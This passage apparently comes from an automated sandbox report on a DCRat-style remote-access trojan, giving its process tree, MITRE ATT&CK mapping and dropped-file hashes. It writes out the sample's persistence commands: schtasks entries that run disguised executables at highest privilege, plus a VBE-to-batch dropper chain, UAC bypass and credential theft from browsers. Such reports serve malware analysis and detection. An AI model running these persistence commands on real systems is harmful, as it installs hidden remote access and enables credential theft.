C:\Windows\system32\schtasks.exeschtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Setup" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Web\xdwdDeltaOpen.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:3172
-
-
-
C:\Windows\Web\xdwdDelta.exe"C:\Windows\Web\xdwdDelta.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Setup" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Web\xdwdDeltaOpen.exe" /RL HIGHEST & exit4⤵
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Setup" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Web\xdwdDeltaOpen.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:4588
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DCRatBuilda.exe"C:\Users\Admin\AppData\Local\Temp\DCRatBuilda.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\blockwin\Uey4G9jLOu96Ny61Odc6qMzirlqd.vbe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:572 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\blockwin\7AofWjGgJu1A5FU93LEjadiQr2.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\blockwin\perfNet.exe"C:\blockwin\perfNet.exe"5⤵
- Modifies WinLogon for persistence
- UAC bypass
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1592 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Idle.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Idle.exe"6⤵
- UAC bypass
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3524 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\68b85691-f8de-4f74-a62b-cb74cbde6026.vbs"7⤵
- Loads dropped DLL
PID:4532
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8a4e5f72-c650-4896-95be-53243c96bc92.vbs"7⤵
- Loads dropped DLL
PID:4872
-
-
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\blockwin\file.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:4984
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:1224
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:4620
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:2544
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\blockwin\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:3800
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\blockwin\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:5108
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\blockwin\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:4352
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Program Files\Java\jre-1.8\legal\javafx\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:2500
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Java\jre-1.8\legal\javafx\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:4884
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Program Files\Java\jre-1.8\legal\javafx\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:4832
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:1400
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:228
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:2176
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Program Files\Google\SppExtComObj.exe'" /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files\Google\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:2608
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:2096
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\System.exe'" /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:2512
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:2744
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:2060
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Windows\IME\it-IT\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:3508
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\IME\it-IT\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:3968
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Windows\IME\it-IT\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:3384
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Idle.exe'" /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:1144
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:3500
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:1844
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Windows\Performance\WinSAT\DataStore\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:780
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\Performance\WinSAT\DataStore\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
- Suspicious behavior: EnumeratesProcesses
PID:888
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Windows\Performance\WinSAT\DataStore\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
PID:4596
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\blockwin\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
PID:2900
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\blockwin\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
PID:4544
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\blockwin\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Scheduled Task/Job: Scheduled Task
PID:4800
-
C:\Windows\Web\xdwdDelta.exeC:\Windows\Web\xdwdDelta.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:128
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
- Loads dropped DLL
PID:1344
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Event Triggered Execution
1AppInit DLLs
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Event Triggered Execution
1AppInit DLLs
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
4Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d0c46cad6c0778401e21910bd6b56b70
SHA17be418951ea96326aca445b8dfe449b2bfa0dca6
SHA2569600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02
SHA512057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949
-
Filesize
18KB
MD5a97d5c8c0c04a9b06036d45fca1faad4
SHA1922f2d9eb6ebda9c86814d78e66dcffa4949620b
SHA256ccc7e9ebae35e0e75a1adad6ec349fa7d3924bd68e6ddd016759c3812ebbd236
SHA5123780e1456c54ee96276c3a8a382d346feb680c73e1ef609440294950b2e90bf01bcb0d3c65ec25d107f81377ca4f766712f9965d7628f40dbcb2333480cb538e
-
Filesize
731B
MD523ea38deb4699f22b7431f5e6d8de42d
SHA1cb6cb368678a613640741439f5f1447e4171943a
SHA25679aa2742892606e4cba0a15a8b91b366d1524ca8f9e5fb0b2b3a9ac7d4691480
SHA512c2a59802fa8fce7145ae5dbb5bb6a757b27f2f6fe53663fe1416fd1aa28829cda844b24822932f459c450b96a555cad6681de59617ad26dff9f9686ed8533aba
-
Filesize
507B
MD541b5de756925bc673af48fa7580a6e1c
SHA10b494e4eae5ba8f4f643a16ecb157295977da019
SHA256d687bde12001d8bb9a8095005ca469c35f963fb4decf102ad4074aadffb52535
SHA5122ac1adb97dff02e5f0ea8379e9e82aa130a399ec779cda899e5561d559d971e7f4093375986b518a5affcd81c073036acdc472bf188269ece6acf9340de6c70f
-
Filesize
3.5MB
MD5cfa948f94f8d7f1fd510585aef476a69
SHA1cd7cf739c1d64110cf22fece8feeeedc26f1603f
SHA2562e03c52c02ed1bd99d98207216daa3a1e0183a3c75bf85fc7c5bc88ca64f53f1
SHA5120e8bac35aeeb1a438603fea0949aceca47436616f3cb35e77d58786dd2ebe3e558dd5ea5a4ed68c09579459f1a6ee5736e7f5f47c2b6f74ae08da72f56de78ef
-
Filesize
491KB
MD53b91589b90ba27dd718891345bfa44a1
SHA11c897b16b1618d84ba0cc504bbfd568f7bff2dbc
SHA256ca2edf76122bdad8371105bd8c25cf694125a706f04bc179fc4a82e8c2c1dcc2
SHA51227f46301a82e3436b58735e827e4f3fd9db5a013402f42b768a526f7ca3e51f3c1e2134cf1fbc215d7a56df9d74010af9de60cf4633facb83c50f2d010fd2d13
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
136KB
MD516e5a492c9c6ae34c59683be9c51fa31
SHA197031b41f5c56f371c28ae0d62a2df7d585adaba
SHA25635c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66
SHA51220fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6
-
Filesize
25B
MD5e2d229f9984a950c6eaff0044fea0bae
SHA1d5277c12ca713e30b012b50113c67df7610363ed
SHA25667888d8ba5f06a23312516c505470a517b8ed91e96fa982b98fe46279061072d
SHA51291b789ab925f9ebbe5f7473552fa8f1ce51f0bd1e030c22432fcefe6307fb778556ee5528038faecb38b0a7fcec45bee7248904d425fde38694e711da7eac99f
-
Filesize
211B
MD53f857d8f136f4c8325296f1046d98c50
SHA15195a4df467a86620605b389d15b80d47e7ff8f9
SHA2569a508ed5788b05d9be357691206a98931bc1cbe1f008f73a98ea9a67f5299614
SHA51224390db1329412da00def04a7b6374f09f7bc48e23f7076715ebfa83c3fa3eb54446449a68acc88e51d0b2bd6756fa08c144a073a944166861bbb337e1cc15cd
-
Filesize
34B
MD5677cc4360477c72cb0ce00406a949c61
SHA1b679e8c3427f6c5fc47c8ac46cd0e56c9424de05
SHA256f1cccb5ae4aa51d293bd3c7d2a1a04cb7847d22c5db8e05ac64e9a6d7455aa0b
SHA5127cfe2cc92f9e659f0a15a295624d611b3363bd01eb5bcf9bc7681ea9b70b0564d192d570d294657c8dc2c93497fa3b4526c975a9bf35d69617c31d9936573c6a
-
Filesize
3.2MB
MD5eac85329879a44b0afd749095a2244ba
SHA1f3b77b7d567770d8a7b1c31b065845c53d31227a
SHA256572c9219476ef031a339820b86e3b63b709cccd4d7b856d05d83a1a9b4e4e7b9
SHA512be1b3bc60185f83473a1b929042767256e545521f5bbbb34b877a32e963f134bf2f842e54fd2c6f6c395b732055559379ce90efe6c466751c6e618c3c9ae709a